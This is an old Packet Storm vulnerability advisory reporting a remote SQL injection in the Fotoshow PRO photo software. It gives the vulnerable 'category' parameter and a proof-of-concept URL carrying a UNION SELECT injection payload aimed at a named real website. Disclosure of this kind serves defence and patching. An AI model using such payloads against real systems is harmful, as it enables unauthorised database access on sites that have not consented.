Fotoshow PRO SQL Injection

2009-08-18T00:00:00
ID PACKETSTORM:80467
Type packetstorm
Reporter darkmasking
Modified 2009-08-18T00:00:00

Description

                                        
                                            `[»]====================================================================================================================[_][-][X]  
[»] [»]  
[»] Fotoshow PRO™ (category) Remote SQL Injection Vulnerability [»]  
[»] [»]  
[»] ======= ------d-------m------ ==== ==== [»]  
[»] || = | |(o o)| | || || || [»]  
[»] || = ||(~)|| || || [»]  
[»] ======= /|\ || || [»]  
[»]==========================================================================================================================[»]  
[»] Author : darkmasking [»]  
[»] Date : August, 15th 2009 [»]  
[»] Contact : darkmasking[at]gmail[dot]com [»]  
[»] Critical Level : Dangerous (*RED) [»]  
[»]--------------------------------------------------------------------------------------------------------------------------[»]  
[»] Affected software description : [»]  
[»] Software : Fotoshow PRO™ [»]  
[»] Vendor : http://www.fotoshowpro.com/ [»]  
[»] Price : $5,000 (USD) http://www.fotoshowpro.com/features.php \0_o/ [»]  
[»]==========================================================================================================================[»]  
[»] [»]  
[»] [~] SQLi POC [»]  
[»] [»]  
[»] [+] http://www.target.com/[path]/results.php?category=[SQli]` [»]  
[»] [»]  
[»] [»]  
[»]--------------------------------------------------------------------------------------------------------------------------[»]  
[»] [»]  
[»] [~] SQLi POC Demo [»]  
[»] [»]  
[»] [+] http://www.macduffeverton.com/stock/results.php?category=-9999 and 1=0 union select null,version(),null,null,null-- [»]  
[»] [»]  
[»]--------------------------------------------------------------------------------------------------------------------------[»]  
[»] [»]  
[»] [~] Greetz [»]  
[»] [»]  
[»] Sorry bro belum dapat teman, jadi untuk diri sendiri aja! (SELAMAT MERAYAKAN 17an | Semoga Meriah) [»]  
[»] [»]  
[»] [»]  
[»]==========================================================================================================================[»]  
  
`